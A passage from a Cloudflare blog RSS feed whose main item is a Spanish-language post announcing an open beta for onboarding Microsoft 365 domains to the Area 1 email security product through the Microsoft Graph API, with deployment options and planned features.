            <category><![CDATA[CIO Week]]></category>
            <category><![CDATA[Cloudflare Access]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <guid isPermaLink="false">2BUD3Ek49Fs0kBopENTn1y</guid>
            <dc:creator>Kenny Johnson</dc:creator>
            <dc:creator>Ankur Aggarwal</dc:creator>
        </item>
        <item>
            <title><![CDATA[Análisis de correo electrónico basado en API]]></title>
            <link>https://blog.cloudflare.com/es-es/api-based-email-scanning/</link>
            <pubDate>Thu, 12 Jan 2023 14:00:00 GMT</pubDate>
            <description><![CDATA[ Ahora los clientes pueden incorporar dominios de O365 a Area 1, lo que añade más flexibilidad en los métodos de implementación ]]></description>
            <content:encoded><![CDATA[ <p>El panorama de la seguridad del correo electrónico cambia constantemente. Lo que no ha cambiado es la dependencia del correo electrónico como el principio de la mayoría de las campañas de amenaza. Los atacantes empiezan a menudo con una campaña de phishing para recopilar credenciales de los empleados que, si tienen éxito, se utilizan para exfiltrar datos, desviar dinero o realizar otras actividades maliciosas. Esta amenaza continúa estando presente, incluso si las empresas realizan la transición para pasar su correo electrónico a la nube, utilizando proveedores como Microsoft 365 o Google Workspace.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3fRadJRFI9bBWzFvq9Q7q0/6df53ce80bc35f5b42c186298b5f9190/image1-32.png" />
            
            </figure><p>En nuestros esfuerzos para ayudar a mejorar Internet y para abordar las amenazas en línea, Cloudflare ofrece seguridad del correo electrónico mediante nuestro producto Area 1 para proteger todos los tipos de bandejas de entrada, ya estén en la nube o en el entorno local. El producto Area 1 analiza cada correo electrónico que recibe una organización, y utiliza los modelos de amenazas para evaluar si el mensaje constituye un riesgo para el cliente. En el caso de los mensajes que se consideran maliciosos, la plataforma de Area 1 incluso impedirá que estos correos lleguen a la bandeja de entrada del destinatario. Esto garantiza que no hay ninguna posibilidad de que el intento de ataque tenga éxito.</p><p>Intentamos proporcionar a los clientes la flexibilidad para implementar nuestra solución de la forma que les resulte más fácil. Siguiendo con estos esfuerzos para que nuestra solución sea lo más integral posible, nos complace anunciar nuestra versión beta abierta para la incorporación de dominios de Microsoft 365 mediante la API de Microsoft Graph. Sabemos que los dominios incorporados mediante la API ofrecen implementaciones más rápidas y más flexibilidad. Este método de incorporación es uno de muchos, así que ahora los clientes pueden implementar los dominios según consideren adecuado sin perder la protección de Area 1.</p>
    <div>
      <h3>Incorporación de dominios de Microsoft 365 mediante la API</h3>
      <a href="#incorporacion-de-dominios-de-microsoft-365-mediante-la-api">
        
      </a>
    </div>
    <p>Cloudflare Area 1 proporciona a los clientes muchas <a href="https://developers.cloudflare.com/email-security/deployment/">opciones de implementación</a>. Tanto si se trata de registro en diario + CCO (donde los clientes envían una copia de cada correo electrónico a Area 1), como si se trata de registros en línea/MX (donde se añade otro salto mediante registros MX) o de conectores de puerta de enlace de correo electrónico seguro (donde Area 1 interactúa directamente con una puerta de enlace de correo electrónico seguro), Area 1 proporciona a los clientes flexibilidad para que puedan implementar nuestra solución como deseen. No obstante, siempre hemos recomendado a los clientes la implementación utilizando registros MX.</p><p>La adición de este salto adicional y los dominios que apuntan a Area 1 permiten al servicio proporcionar protección con sinkholes. Esto garantiza que los correos electrónicos no llegan a la bandeja de entrada de destino. Sin embargo, detectamos que la configuración de Area 1 como el primer salto (es decir, cambiando los registros MX) puede requerir aprobaciones de otros equipos de las organizaciones y puede causar ciclos adicionales. Además, las organizaciones deben asimismo esperar a que este cambio en línea se refleje en el DNS (lo que se conoce como tiempo de propagación de DNS). Sabemos que nuestros clientes desean estar protegidos lo antes posible mientras realizan estos ajustes necesarios.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/27WhZHBE17nRxuXOdNVFYD/883e3726e201af66e452f11c53f3fe2b/image2-21.png" />
            
            </figure><p>Con la incorporación de Microsoft 365, el proceso de añadir protección requiere menos pasos de configuración y menos tiempo de espera. Ahora utilizamos la API de Microsoft Graph para evaluar todos los mensajes asociados con un dominio. Esto permite mayor flexibilidad a los equipos de operaciones para la implementación de Area 1.</p><p>Por ejemplo, un cliente de Area 1 que participa a menudo en transacciones de fusiones y adquisiciones debido al carácter de su sector se beneficia de poder implementar Area 1 rápidamente utilizando la API de Microsoft. Anteriormente a la incorporación de la API, los equipos informáticos necesitaban tiempo para compaginar la entrega de los distintos recursos de la adquisición. La asignación de los nuevos derechos de acceso, el traspaso de propiedad y otras tareas requerían tiempo, durante el cual los buzones quedaban desprotegidos. Por el contrario, ahora, cuando los clientes adquieren una nueva entidad, pueden utilizar la incorporación de la API para añadir rápidamente protección para los dominios que acaban de adquirir. Esto les permite tener protección en las direcciones de correo electrónico asociadas con el nuevo dominio, mientras trabajan para completar las otras tareas disponibles. A continuación puedes ver cómo funciona nuestro proceso de incorporación de la API.</p><p>Una vez que estamos autorizados a leer los mensajes entrantes de Microsoft 365, empezaremos a procesar los correos electrónicos y a activar las detecciones cuando hay correos electrónicos sospechosos. Este nuevo proceso de incorporación es considerablemente más rápido. Para empezar solo requiere unos clics.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6aDQVkfjyA7XhTEREVsQdl/d5fbd0ce4fd4a37eeb632e4a3a9ae890/image4-16.png" />
            
            </figure><p>Para iniciar el proceso, elige qué dominio te gustaría incorporar mediante la API. A continuación, en la interfaz de usuario, puedes ir a “Domains &amp; Routing” en los ajustes. Cuando hayas añadido un nuevo dominio y elegido la exploración de la API, puedes seguir nuestro asistente de configuración para autorizar a Area 1 a empezar a leer los mensajes.</p><p>Exploración de la API</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1hQK1E7Ixpq6aFUyVYxNCQ/44e3767916583a12294dc8f6751cc507/image5-12.png" />
            
            </figure><p>Apenas unos minutos tras la autorización, la organización estará protegida por Area 1.</p><p>Listo para la exploración</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2yOicmQz0n4vvNTy58MIPD/103938baee0a9c0948aff6a4421337d7/image3-20.png" />
            
            </figure>
    <div>
      <h3>Qué viene a continuación</h3>
      <a href="#que-viene-a-continuacion">
        
      </a>
    </div>
    <p>Este proceso de incorporación forma parte de nuestros esfuerzos continuos para proporcionar a los clientes la mejor protección del correo electrónico. Con nuestra incorporación de la API, proporcionamos a los clientes mayor flexibilidad para implementar nuestra solución. De cara al futuro, nuestra incorporación de la API de Microsoft 365 abre la puerta a otras funciones.</p><p>Ahora, nuestro equipo está estudiando cómo añadir la capacidad de explorar retroactivamente los correos electrónicos enviados antes de la instalación de Area 1. Esto brinda a los nuevos clientes la oportunidad de limpiar cualquier correo electrónico anterior que pudiera representar un riesgo para la organización. También estamos buscando cómo proporcionar más elementos para las organizaciones que desean tener más control sobre qué buzones explorar con Area 1. Próximamente, los clientes podrán indicar en la interfaz de usuario en qué buzones desean que Area 1 realice la exploración del correo electrónico entrante.</p><p>Actualmente, también limitamos el tipo de implementación de cada dominio a un solo tipo (es decir, podemos incorporar un dominio utilizando registros MX o mediante la API). Sin embargo, ahora estamos buscando cómo proporcionar a los clientes la capacidad de realizar implementaciones híbridas, utilizando tanto la API como registros MX. Este enfoque combinado no solo proporciona la máxima flexibilidad, sino también la máxima cobertura.</p><p>El equipo de Area 1 está trabajando en muchas otras características que desea proporcionar a los clientes en 2023. Y esta versión beta abierta nos permite desarrollar estas nuevas funciones.</p><p>Todos los clientes pueden participar en la versión beta abierta. Por lo tanto, si te interesa incorporar un nuevo dominio mediante este método, sigue los pasos anteriores y consigue la protección de Area 1 en tus dominios de Microsoft 365.</p> ]]></content:encoded>
            <category><![CDATA[CIO Week]]></category>
            <category><![CDATA[Noticias de productos]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <guid isPermaLink="false">53YarcYx9mwYRZbY8eUbSX</guid>
            <dc:creator>Ayush Kumar</dc:creator>
        </item>
    </channel>
</rss>